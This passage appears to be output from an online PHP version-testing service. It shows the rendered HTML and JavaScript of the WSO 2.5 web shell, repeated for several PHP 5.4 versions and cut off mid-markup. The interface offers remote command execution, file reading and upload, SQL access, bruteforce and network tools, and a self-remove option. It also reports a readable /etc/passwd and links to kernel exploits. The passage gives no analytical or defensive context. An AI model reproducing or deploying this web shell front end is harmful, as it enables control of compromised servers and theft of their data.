d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.20 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.19
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.19 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.18
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.18 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.17
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.17 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.16
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 